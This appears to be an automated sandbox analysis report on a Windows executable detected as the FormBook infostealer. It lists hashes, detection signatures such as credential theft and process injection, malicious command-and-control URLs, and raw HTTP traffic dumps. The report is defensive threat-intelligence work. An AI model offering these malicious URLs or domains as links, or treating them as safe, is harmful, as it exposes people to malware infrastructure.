Windows Analysis Report
Qte2311.exe

Overview

General Information

Sample Name: Qte2311.exe
Analysis ID: 1345581
MD5: fde8126bd37c19b5f5d3096012ec9300
SHA1: e469f910764853a6282199890585ff90921b0474
SHA256: c3a05d6a46d701f52bad7f04085236bd924e33a7590eca472cf2794cce430374
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Uses runas.exe to run programs with evaluated privileges
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

barindex
Source: Yara match File source: 3.2.Qte2311.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Qte2311.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.drtonks.com/ Avira URL Cloud: Label: phishing
Source: http://www.rva.info/u0t4/ Avira URL Cloud: Label: malware
Source: http://www.drtonks.com/u0t4/?ipNhfX=yeZb8GK9kb308m6tqpQSWKVePpKokD/DhHuephdMkCBCe/gXfDvon4YRbmogRZs51d24yXmjv9s2GuQK2J30uG9jNiVx5pUDTA==&DDMD=2V_pWNT8ifT Avira URL Cloud: Label: phishing
Source: http://www.owcojyyde.best/u0t4/?ipNhfX=T+ktEIOjX9T5dGcj9rUsXIa48WZT28SiLvO+yVBZwvWEp9g0wSKFlyHjxBvBWF4XQFrqNUOHqhRxKaY3zbxWdu06McXUafUYdA==&DDMD=2V_pWNT8ifT Avira URL Cloud: Label: malware
Source: https://www.rva.info/u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK Avira URL Cloud: Label: malware
Source: http://www.rva.info/u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK+dlDXWJ9cmev8ZYmFh9Bk+wzUoT6TgNjxSlOMQ==&DDMD=2V_pWNT8ifT Avira URL Cloud: Label: malware
Source: http://www.owcojyyde.best/u0t4/ Avira URL Cloud: Label: malware
Source: www.drtonks.com Virustotal: Detection: 8% Perma Link
Source: www.rva.info Virustotal: Detection: 14% Perma Link
Source: www.arteunmapa.com Virustotal: Detection: 5% Perma Link
Source: www.02omn1.cfd Virustotal: Detection: 10% Perma Link
Source: http://www.drtonks.com/ Virustotal: Detection: 8% Perma Link
Source: http://www.rva.info/u0t4/ Virustotal: Detection: 13% Perma Link
Source: Qte2311.exe Joe Sandbox ML: detected
Source: Qte2311.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Qte2311.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: firefox.pdbP source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rcQ.pdb source: Qte2311.exe
Source: Binary string: runas.pdbGCTL source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110091796.0000000000608000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110534706.000000000099E000.00000002.00000001.01000000.0000000C.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4110753572.000000000099E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Qte2311.exe, 00000003.00000002.1744906371.0000000001810000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1744647151.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.0000000005070000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1747191633.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.000000000520E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Qte2311.exe, Qte2311.exe, 00000003.00000002.1744906371.0000000001810000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000005.00000003.1744647151.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.0000000005070000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1747191633.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.000000000520E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: runas.pdb source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110091796.0000000000608000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rcQ.pdbSHA256 source: Qte2311.exe
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FABB80 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FABB80
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then pop edi 5_2_02FA13F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then xor eax, eax 5_2_02F997C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then pop edi 5_2_02FA13EF
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then pop edi 5_2_02FA13DD
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then pop edi 5_2_02F9DCDA
Source: Joe Sandbox View IP Address: 217.160.0.131 217.160.0.131
Source: Joe Sandbox View IP Address: 217.160.0.131 217.160.0.131
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://majinfo.tech/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 21 Nov 2023 03:46:15 GMTData Raw: 31 33 36 36 0d 0a c0 d7 24 a2 9a f6 43 44 14 f3 01 d0 48 59 38 7f 7f 84 0c 73 ff 6f 4b ab b3 7d 39 29 ca 6b 07 75 09 01 de 48 e1 a2 d7 2d b5 f6 2c 71 c6 4f 88 0f 56 22 24 46 fa 78 69 8a 73 ad ea 3f 9f 17 7b cb a6 30 55 c5 21 d2 c9 bc fe b4 d0 8e 19 0f 16 75 da bd fe 77 bf 2f fd 16 48 0a c0 99 29 a2 2a 1f 3f ae ad 4a 5e 22 3e 89 21 a2 24 37 8f 3e 0c 00 fe 2d fe 59 40 2a a2 ae 30 b8 40 a8 fc c8 15 72 6b 5c 1f 63 fb 53 40 14 70 2b b3 c7 d0 f5 bf 5c a5 09 b6 93 3b b3 5a 40 9d af e6 b3 37 47 ec cc f9 ab fe 66 25 05 1b 7f fa 40 49 ef a1 d1 97 92 ba b6 20 47 c4 3e 14 49 e2 da 5e 74 90 d8 70 4b 11 27 05 59 7f 35 9f cd c6 58 57 1d a5 0f 80 25 d5 0e ea 5d ca ca 0e 4a aa 51 06 ca 33 39 d4 ba a9 e4 af 11 27 47 83 af 1a 07 25 0d 94 19 25 75 e4 8c b6 2f c4 83 29 69 ef 5d a3 0d 0c 69 7c 8e 50 24 49 db f5 ad 70 be 4d 2e 8d 4d 32 4c e6 64 52 c9 ac 73 46 b2 4a fc 9f 44 1e 7a d4 9d fe 47 a2 76 96 54 57 f2 5e da 17 f2 a7 c4 23 89 a3 3a 0f 2f ed 4b 27 f1 78 81 00 1c e4 44 58 0f 06 35 1a f8 ea ad 6c 81 fc e5 90 2c db fe 60 48 4c 3a f9 ac 6d e3 04 82 3a 4e ae c6 ab b2 38 bd 43 ad 9b 82 6e 10 27 d6 2d ef df 19 dd 93 93 d7 0c 9f c6 29 69 e0 3b 0b ec e1 d3 87 94 85 30 9c a0 45 90 1d 40 1e 58 53 8d e4 e5 a3 26 45 08 54 26 19 5c 9c 1c 3b 8d 67 8d 08 be 50 d2 d7 0c cc 33 0c 5d 27 fd f5 b0 d0 c8 59 76 d0 9d 6c 01 5d 6b e6 ed 61 fa 85 c9 08 5e 7b 28 a9 41 94 35 f5 ab e7 e0 ac 8d 7c 36 2f ed 4b dc 49 3c c6 41 1d a1 93 f4 ab 91 7e 13 5a da 05 69 a1 6b 18 a0 96 70 be a5 9c 7e 33 75 40 11 5a 3c 8e f4 1b 31 84 16 74 42 41 9f 94 d3 6f 74 8d ca a5 6a 6c 72 db 03 a2 34 3c b8 82 fe f9 03 f9 d6 68 f2 9b 7c 01 4f 27 4e 71 f6 fc 0b aa 0f 1a e1 91 ec 9d 34 4b 28 a7 83 37 01 33 01 8a 7c 98 2c a8 cd c5 c8 78 ee c4 a9 b6 f9 50 08 2d b2 0c d1 ed 8b de ca 36 fb f6 0c 55 ef 88 79 64 22 af 42 88 fb 10 a7 3a bc 95 1e 1f 1a fe 48 2a c8 bc 27 3f 4d 6f 12 65 b0 7e 95 2f 18 12 d3 df c2 bf 9c af df 7a 08 81 7c f8 f1 81 4c 13 89 5e 0c f3 8c c7 eb ae b6 21 be 42 03 c9 a8 8e 77 b9 8f 93 3b 3e 2c 77 1a 47 b1 dc a0 b9 af a2 7f c2 5c 98 8b 90 83 4c ee f8 81 e4 27 80 3a a7 e3 63 fe bf d5 00 d4 09 0d 7b 31 7e ef ba 0e 2c 06 26 48 11 c3 71 43 92 fa ac 71 92 9e f4 b2 05 23 af e0 0f f2 59 5e 06 6f 48 49 ac a2 9b 73 1f 9f 9c 86 25 f9 6b b7 c5 f2 59 5e 44 7f ec bf a6 3b 62 97 71 6b 5c 25 cd c1 3a ab 80 94 84 36 cb 6a bd c9 2a 99 6e c0 4f db 00 fe 04 fe 80 ba 03 52 92 2c 4f d3 cd ea 7e 95 6f c8 76 d6 e1 b0 94 d2 ee 4b 42 83 24 75 c3 9e 0f ba 86 21 05 ef 67 20 25 19 69 ef 02 1e f0 da 43 a0 c5 a3 4b 14 e5 54 f9 bb 7b e2 f4 30 40 9f e5 d0 ea 13 78 5a 34 d2 04 e0 b4 93 97 43 31 38 5f 5a 64 59 9e 72 3a 6d 7b 69 3c 54 1e e4 cb f4 2c bb 4e 8b
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://majinfo.tech/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 21 Nov 2023 03:46:19 GMTData Raw: 31 33 36 37 0d 0a c0 d7 24 a2 9a f6 43 44 14 f3 01 d0 48 59 38 7f 7f 84 0c 73 ff 6f 4b ab b3 7d 39 c9 ca 6b 07 75 84 00 af 09 2e 7a dd 52 6b cf 12 67 fc 84 f8 60 25 42 62 a4 8f 97 a6 38 d7 aa fe f3 79 b1 b7 6c 0a 53 55 1c 22 9d cc eb 4f 0b ed 98 f1 60 51 a7 dd eb 7f f7 fb d2 6f 81 a4 00 9c 99 22 aa f2 f1 e3 da aa e4 25 e2 93 18 22 4a 72 f3 e8 c3 00 e0 df e2 9f 05 a4 22 ea 0a 83 0b 84 ca 8f 5c 21 b7 c6 f5 31 b6 3f 05 44 01 b7 32 7b 0c 5d ff cb 55 9a 60 3b b9 33 a9 05 d4 f9 6a 3a 79 73 c4 d6 9c bf ea 6f 56 50 b0 f1 a7 0f 94 74 1e 6a 7d 29 a8 6b 72 72 44 ec 42 9e 24 ae e9 44 0b 89 0d 37 14 71 52 90 d5 57 d3 c9 6c 8c 75 d5 51 fa 00 58 50 ed a0 de a5 ac 6c a1 a0 1a 65 a0 3c 93 43 ad 9b 0a fe 1a 71 72 34 f8 aa 71 50 d2 40 91 51 52 47 ce 68 fb 4a 3c 98 82 76 de d5 da c0 90 c6 e7 08 79 92 34 6d d7 08 e7 9b e4 52 db 24 c3 64 4e 26 95 cc 3a 67 24 ab c4 ff 49 e4 b1 43 dd ea 7f 24 6a 67 49 79 25 ef a5 7d 25 7f 4a 3c 92 38 aa f3 f0 d2 be b6 12 8f 17 08 c0 41 4e 84 f5 60 50 a3 81 af de ca 06 c8 5f 0e c9 b2 ed 0f 86 c4 a4 95 2f da d6 4e 20 a8 e3 e4 6a bc 2a 8b d3 3b d4 ba 29 e8 06 71 62 dd f2 fe 9d d1 3d 39 79 cd f0 69 9c 92 06 be b3 c0 1e 3e 7d 48 59 08 c3 09 5a 04 d9 01 e4 81 35 d5 48 5e 3e 6a 52 84 40 65 92 c1 c5 c9 b1 d3 78 d6 88 e0 73 25 7d c5 c0 3c 43 df b6 d2 5f 0f 0b 8d 9c 65 07 dd ca 06 d0 b5 66 de 1e a6 5f 98 8c e0 b5 83 82 1a 44 59 53 dd bd 04 67 6d e4 b3 79 69 5f e3 56 e2 31 0e ea 08 ad a4 5f 0d f4 9b d0 d2 2e 48 73 5d c3 00 b5 84 f3 0d e5 f4 9b a9 03 8a d0 fc 69 a0 df 88 21 34 a7 13 0a fa a4 9c 7e a3 2b 54 2e 55 63 93 9b 0e 10 a5 e1 c1 e5 f4 cf 1f c8 b7 46 93 df e4 2b 78 3a 72 8a b3 e7 5f 50 7e d0 08 8f 64 ef a4 59 42 39 ed bd 09 98 09 50 e4 c3 64 41 6d ce 07 c6 73 47 4e b5 cd 87 42 68 9e 65 88 6e 5f f4 56 36 d9 37 67 28 3b 47 cc 23 13 79 15 42 dc 87 38 d5 e1 ad f4 f8 58 f3 47 52 41 e6 3d f9 79 7c 93 28 83 f5 ab 7c c1 90 98 fe 16 fe e5 7c f5 d6 43 08 e4 c3 8f 8f 64 9a 48 f4 62 98 66 3c 5e b7 95 0d f1 15 1a 48 46 75 bc cd 7d 9c dc f2 61 b9 d5 38 8a e5 06 cd 7d 15 fd 13 e6 c2 5c 84 1c 64 72 c7 0f 24 3f 01 54 39 1d 1f f3 ff ad 1a a0 4a 68 d8 8b f1 7b d7 b6 60 31 30 41 8a 18 8e 1b 92 d4 67 8d 93 f4 a4 93 0d 18 79 05 7f 90 2f f2 d2 7b 43 0a 62 15 dd 9c bb f8 e4 34 2c c9 5f bb 2d 96 2f f2 22 ba 63 f7 35 dd 11 bb 8c 1b e3 4a 69 0e d6 59 05 a4 20 b4 5e 94 ab 75 56 ca 74 0d 7e da 06 f0 27 f0 07 d4 2d 90 82 64 db 34 5d 2f ef 97 db 07 b2 9d 75 38 2c a5 b4 fb 82 d0 20 49 dd b0 e7 83 ae 60 48 c1 fb 19 48 41 06 da b9 80 07 bc 76 10 68 fe e4 12 45 39 55 fe ee 9e 39 3d 0c d0 67 39 34 fa 04 9e e6 b5 34 01 38 6d e5 e5 50 0c ce 97 e6 59 b6 4d 39 9d b6 bd 34 1e 4a 0f f2 75 7a 96 5d a7 f9
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://majinfo.tech/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 21 Nov 2023 03:46:21 GMTData Raw: 31 33 36 37 0d 0a c0 d7 24 a2 9a f6 43 44 14 f3 01 d0 48 59 38 7f 7f 84 0c 73 ff 6f 4b ab b3 7d 39 29 ca 6b 07 75 09 01 5e 53 b8 e8 75 4b ad 3d 4b 9c f1 13 e2 03 4a 84 c4 48 1f 2f 4d 71 ae 55 fd e7 f3 62 6f d9 14 a6 aa 38 44 3a 99 d7 9f 16 da 31 e3 c1 a2 4e bb d7 ff ee f7 a5 df 02 49 01 38 33 45 54 e5 e3 c7 b5 55 c9 4b c4 27 31 44 94 e4 e6 d1 87 01 c0 bf c5 3f 0b 48 45 d4 15 06 17 08 95 1f b9 42 6e 8d eb 63 6c 7f 0a 88 02 6e 65 f6 18 ba fe 97 ab 34 c1 76 72 67 56 0b a8 f3 d5 7c f6 a6 c5 ce 9c bf ea 6f 56 50 b0 f1 a7 0f 94 f4 1e 6a 7d 29 a8 6b 72 d2 22 f6 21 4f 12 d7 f4 a2 83 c4 86 5b 8a 38 29 c8 ea ab f9 6c 36 c6 ba aa 95 3e 00 16 54 3b a8 77 29 2b 3b 28 a8 46 19 28 cf e4 50 eb a6 82 bf 46 9c 1c 0d be 6a 1c 94 34 50 64 94 d4 91 33 da be 10 0f a6 a0 bd 77 b5 36 30 a4 f1 39 42 9e 24 4d d7 37 c2 f9 26 b9 d4 36 c9 30 99 93 49 25 b3 ce 19 c9 2a f1 7f 12 79 e8 51 77 fa 1f 89 da 59 52 5e c9 7b 69 5f c8 9f 12 5b 12 47 75 1e 5e da 97 4e 62 7b 81 00 1c e4 44 58 0f 06 35 1a f8 ea ad 6c 80 fc e5 90 2c db fe 60 48 4c 3a f9 ac 6d ed 04 82 6a 27 57 e3 55 59 9c de a1 d6 4d 41 37 88 13 eb 96 f7 ef 8c ee c9 c9 6b 86 4f e3 94 34 f0 9d 05 f6 f8 e9 43 ca 42 18 4e d0 22 c8 0e 20 0f ac a9 46 f2 f2 51 93 22 04 2a 93 0c 2e 4e 8e 9d c6 b3 46 04 9f 2b e9 2b 06 e6 19 86 ae 93 fe 7a 5c 68 e4 2c 3b ea 4e 36 80 ae 35 f3 f6 30 fd c2 64 04 af 3d 14 d4 20 ca 9a ea d5 73 70 d6 46 3e 9b 97 f6 25 ee 24 b6 71 50 2d 74 92 7e 35 d2 6f 42 4b bb 20 cd 75 0d 03 d4 12 ce 37 94 d3 6f a6 0e 28 42 f3 c7 91 7e 23 86 d0 9c 4e 28 e8 93 72 fa 8d ae 50 b9 54 8d 4d 6e 7b 40 94 86 07 97 d3 3f 7f 20 df 1a 4d 7e 93 2f e0 e9 c4 29 ce 9e 7f 41 f9 41 23 3c 92 bd 93 66 09 e5 74 f0 26 60 26 40 91 0f 93 05 b5 39 1f 19 cf 9d 38 d5 36 1f 0a a1 79 96 21 ba 7d d1 5b d9 64 df 9e a1 ec 1d 31 8f 4c e4 55 08 71 1f e2 54 87 b7 d2 e3 43 cd 1f 49 05 99 f7 e4 a7 e9 4d a2 0c d6 af f2 05 43 62 fa 5b f8 97 f3 d5 5b 0f 21 90 0f 3f 3e 90 69 22 d1 8b 61 9e f1 78 dd 55 36 c4 57 68 20 19 55 7b 97 fb 38 b9 e3 c3 72 a7 71 14 cb 0d 9a fb 2a fa 27 cc 85 b9 08 39 c8 e4 8e 1f 48 7e 02 a8 72 3a 3e e6 ff 5b 35 40 95 d0 b0 17 e3 f7 ae eb c0 62 60 82 14 31 1c 37 24 a9 cf 1a 27 e9 49 2f 1b 30 f2 0a fe 28 9f e5 65 f0 86 14 c4 2a ba 39 f7 f1 c9 69 58 92 bf 76 5b 2c 9f e5 45 f4 6d ff 35 dd 13 bb 8c 1b e3 4a 69 8e d6 59 05 a4 20 b4 5e 96 eb 4d 56 ca 74 03 7e da 06 f0 27 f0 47 d4 1d 90 82 64 bb 34 dd ac ee 57 f7 19 d9 ce 3a 1c 97 52 da 7d 41 68 90 a4 6e d8 f3 51 57 30 a4 e0 fd 0c a4 20 23 ed 5d c0 23 5e 7b 08 34 7f 74 89 a2 9c 2a 7f 77 4f 9c 1e 06 e8 b3 1c 1b 7d 02 4f f3 5a 9a 00 9c 76 f2 72 2c 06 e7 4b f3 2c db a5 9c 4e db 5e 1a 8f a5 07 f9 32 3d cb ae d3 7c b7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Nov 2023 03:47:06 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Nov 2023 03:47:09 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Nov 2023 03:47:12 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
